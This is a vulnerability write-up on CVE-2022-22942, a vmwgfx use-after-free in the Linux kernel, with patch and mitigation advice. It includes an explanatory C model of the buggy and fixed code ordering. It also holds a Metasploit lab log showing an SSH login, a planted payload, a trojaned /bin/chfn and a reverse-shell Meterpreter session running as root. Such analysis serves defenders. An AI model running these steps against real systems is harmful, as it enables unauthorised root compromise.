CVE-2022-22942
Description
The vmwgfx driver contains a local privilege escalation vulnerability that allows unprivileged users to gain access to files opened by other processes on the system through a dangling ‘file’ pointer.
Ratings
- Attacker Value: High
- Exploitability: Medium
Technical Analysis
Description
This is a Linux local privilege escalation against VMware virtual machines running kernels 4.14-rc1 through 5.17-rc1, caused by a bug in the vmwgfx DRM driver (the VMware virtual GPU driver that is loaded in VMware guests). Specifically, a use-after-free flaw in the kernel's vmw_execbuf_copy_fence_user function in drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c leaves a dangling file descriptor when the copy of the fence data to user space fails, which allows an authenticated local user to escalate privileges and spawn a root shell.
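The ordering bug behind this CVE, as an added user-space model (this is not code from the AttackerKB page, the Metasploit module or the Linux kernel): in the vulnerable vmwgfx_execbuf.c the sync_file's struct file was installed into the fd table before the fence data was copied to user space, and when that copy failed the error path called fput() and put_unused_fd() on an fd that was already installed, leaving the table entry pointing at a released struct file that a later allocation could reclaim. The upstream fix defers fd_install() until the usercopy has succeeded. The fd table, the refcount-as-free model, the copy_to_user_fails flag and the names struct task_files, execbuf_vulnerable and execbuf_fixed are simplified stand-ins chosen for this example, not kernel APIs.

```c
#include <stdbool.h>
#include <stdio.h>

#define NR_FILES 8  /* size of the modelled fd table and struct file pool */

/* Stand-in for struct file: refcount 0 models a freed object. */
struct file { int refcount; const char *name; };

/* Stand-in for a task's files_struct, plus the pool struct files come from,
 * so that a released object can be handed out again first-fit (simplified). */
struct task_files {
    struct file *fd[NR_FILES];  /* installed descriptors */
    bool reserved[NR_FILES];    /* taken by get_unused_fd(), not yet installed */
    struct file pool[NR_FILES];
};

static struct file *alloc_file(struct task_files *t, const char *name)
{
    for (int i = 0; i < NR_FILES; i++)
        if (t->pool[i].refcount == 0) {
            t->pool[i].refcount = 1;
            t->pool[i].name = name;
            return &t->pool[i];
        }
    return NULL;
}

static void fput(struct file *f) { if (f && f->refcount > 0) f->refcount--; }

static int get_unused_fd(struct task_files *t)
{
    for (int i = 0; i < NR_FILES; i++)
        if (!t->fd[i] && !t->reserved[i]) { t->reserved[i] = true; return i; }
    return -1;
}

/* Gives the fd number back; like the kernel's, it does not touch fd[fd]. */
static void put_unused_fd(struct task_files *t, int fd) { t->reserved[fd] = false; }

/* From here on user space can reach f through fd. */
static void fd_install(struct task_files *t, int fd, struct file *f)
{
    t->reserved[fd] = false;
    t->fd[fd] = f;
}

/* Vulnerable ordering (pre-fix vmwgfx): install first, copy second, and on a
 * failed copy release the file and fd number while fd[fd] still points at the
 * file. Returns the fd, or -1 (the kernel's -EFAULT) when the copy fails. */
static int execbuf_vulnerable(struct task_files *t, bool copy_to_user_fails)
{
    int fd = get_unused_fd(t);
    struct file *sync = alloc_file(t, "sync_file");
    if (fd < 0 || !sync) return -1;
    fd_install(t, fd, sync);
    if (copy_to_user_fails) {
        fput(sync);            /* struct file released ...            */
        put_unused_fd(t, fd);  /* ... but t->fd[fd] still points at it */
        return -1;
    }
    return fd;
}

/* Fixed ordering (as in the upstream fix): copy first, install only on
 * success; the file dropped on failure was never reachable from user space. */
static int execbuf_fixed(struct task_files *t, bool copy_to_user_fails)
{
    int fd = get_unused_fd(t);
    struct file *sync = alloc_file(t, "sync_file");
    if (fd < 0 || !sync) return -1;
    if (copy_to_user_fails) {
        fput(sync);
        put_unused_fd(t, fd);
        return -1;
    }
    fd_install(t, fd, sync);
    return fd;
}

/* True when an installed fd points at a released struct file (the UAF). */
static bool has_dangling_fd(const struct task_files *t)
{
    for (int i = 0; i < NR_FILES; i++)
        if (t->fd[i] && t->fd[i]->refcount == 0) return true;
    return false;
}

/* The follow-on an attacker needs: a later allocation (another open(), possibly
 * by a privileged process) reclaims the released struct file, so the stale fd
 * now aliases an unrelated file. Returns true when that aliasing happens. */
static bool stale_fd_aliases_new_file(struct task_files *t)
{
    int stale = -1;
    for (int i = 0; i < NR_FILES; i++)
        if (t->fd[i] && t->fd[i]->refcount == 0) stale = i;
    if (stale < 0) return false;
    return t->fd[stale] == alloc_file(t, "victim_file");
}

int main(void)
{
    struct task_files vuln = {0}, fixed = {0};
    execbuf_vulnerable(&vuln, true);
    execbuf_fixed(&fixed, true);
    printf("vulnerable ordering: dangling fd %s, aliases new file %s\n",
           has_dangling_fd(&vuln) ? "yes" : "no",
           stale_fd_aliases_new_file(&vuln) ? "yes" : "no");
    printf("fixed ordering: dangling fd %s\n", has_dangling_fd(&fixed) ? "yes" : "no");
    return 0;
}
```

The point to take away is the invariant the fix restores: fd_install() must be the last step that can fail-free, because once a descriptor is visible to user space the caller can no longer "undo" it with put_unused_fd(); it has to close() the installed fd or never install it in the first place.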
Attacker Value & Exploitability
Linux kernel 4.14 was released on 12 November 2017 and 5.17 on 20 March 2022. Although this vulnerability only affects VMware virtual machines, I would expect the attack surface to be rather large given the wide range of kernels affected: about 4.5 years of Linux kernel releases.
Exploitation requires user-level privileges; however, once those are obtained, exploitation is trivial given the Metasploit module written for this vulnerability. Simply get a user session and run the exploit, as demonstrated below:
msf6 auxiliary(scanner/ssh/ssh_login) > run rhosts=172.16.199.132 rport=4444 username=msfuser password=notpassword
[*] 172.16.199.132:22 - Starting bruteforce
[+] 172.16.199.132:22 - Success: 'msfuser:notpassword' 'uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux msfuser-virtual-machine 5.13.12-051312-generic #202108180838 SMP Wed Aug 18 08:41:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 8 opened (172.16.199.1:55151 -> 172.16.199.132:22) at 2023-01-20 09:34:18 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > run session=8 rhosts=172.16.199.132 rport=4445
[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture:
[*] Started reverse TCP handler on 172.16.199.1:4445
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. vmwgfx installed
[+] Original /bin/chfn backed up to /Users/jheysel/.msf4/loot/20230120093436_default_172.16.199.132_binchfn_034079.bin
[*] Uploading payload to /tmp/.6ntizxlWd8
[*] Writing '/tmp/.6ntizxlWd8' (282 bytes) ...
[*] Launching exploit...
[*] Sending stage (3045348 bytes) to 172.16.199.132
[+] Deleted /tmp/.oWt34mDG4b
[*] Meterpreter session 9 opened (172.16.199.1:4445 -> 172.16.199.132:36990) at 2023-01-20 09:34:45 -0500
[*] Replacing trojaned /bin/chfn with original
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.16.199.132
OS           : Ubuntu 22.04 (Linux 5.13.12-051312-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
Defensive Suggestions
To protect against exploitation of this vulnerability, ensure your Linux VM kernels are up to date and that the VMs are only connected to the network where necessary.
If you are absolutely unable to upgrade the kernel of a vulnerable machine, it is possible to prevent the vulnerable kernel module (vmwgfx) from loading, at the cost of the guest's accelerated graphics; Red Hat documents how to blacklist a module here: https://access.redhat.com/solutions/41278. However, this is a band-aid fix that promotes poor security posture; update the kernel whenever possible.
General Information
Vendors
- vmware
Products
- photon os 3.0
- photon os 4.0